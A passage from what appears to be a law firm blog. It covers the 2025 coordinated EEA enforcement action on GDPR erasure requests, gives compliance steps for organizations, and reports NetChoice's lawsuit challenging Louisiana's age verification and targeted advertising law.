The right to erasure is one of the most frequently exercised rights under the GDPR. However, it is also a common source of complaints to DPAs and, when exercised in conjunction with other rights, such as the right to portability, is one of the more visible areas of GDPR noncompliance. The 2025 CEF action involves thirty-two DPAs across the European Economic Area that will begin contacting organizations directly to engage in formal and informal activities aimed at evaluating how the organizations handle and respond to erasure requests. A particular focus of the CEF action will be:

assessing organizational compliance with the conditions and exceptions outlined in Article 17 of the GDPR;
identifying gaps in the processes used by data controllers to manage data subject requests to erase; and
promoting best practices for organizations’ handling of such requests.

Organizations across various sectors can expect increased scrutiny from DPAs. This may include simple information requests from DPAs to evaluate their current erasure practices and procedures, but will also, in some circumstances, result in formal investigations and regulatory follow-up actions. Because this is a coordinated, pan-European enforcement focus, organizations can expect more targeted follow-ups both nationally and internationally as the year progresses.
Organizations can prepare for the heightened attention due to be paid to their erasure request handling processes by taking proactive steps to ensure that their data management practices align with GDPR requirements, particularly regarding:

timely and accurate responses to erasure requests (i.e., within one month of the request);
accurate application of exceptions, such as when data retention is necessary for legal compliance, or tasks carried out in the public interest or in the exercise of official authority;
appropriate notification of erasure requests to other organizations where relevant personal data has been disclosed or made public;
comprehensive processes to effectively erase data, such as erasure of personal data on backup systems in addition to live systems; and
transparent communication with individuals who submit requests for erasure about their rights and the outcomes of their requests.

Organizations may also want to review their broader GDPR compliance frameworks, as a pulled thread on a single identified non-compliance issue could unravel further areas of scrutiny and potentially trigger a larger and broader investigation into the business’s compliance posture on the whole.

NetChoice Sues to Halt Louisiana Age Verification and Personalized Ad Law

On March 18, 2025, NetChoice filed a lawsuit seeking to enjoin a Louisiana law, the Secure Online Child Interaction and Age Limitation Act (S.B. 162) (“Act”), from taking effect this July. The Act requires social media companies subject to the law to obtain express consent from parents or guardians for minors under the age of 16 to create social media accounts. The Act also requires social media companies subject to the law to “make commercially reasonable efforts to verify the age of Louisiana account holders” to determine if a user is likely to be a minor. Further, the Act prohibits the use of targeted advertising to children.
In its complaint, NetChoice has raised a First Amendment objection to the age verification requirement, arguing that the obligation “would place multiple restrictions on minors’ and adults’ abilities to access covered websites and, in some cases, block access altogether.” NetChoice has argued that the restriction is content-based, because the law applies to social media platforms and compels speech by requiring social media platforms to verify users’ ages. NetChoice also has argued that the law’s definition of targeted advertising is overly broad and not properly tailored to mitigate the potential impacts to free speech; in other words, NetChoice has argued that Louisiana has not shown that the age verification and advertising restrictions are necessary and narrowly tailored to address the impact of social media use on minors.
We previously blogged about lawsuits NetChoice has filed seeking to block Age Appropriate Design Code laws in California and Maryland.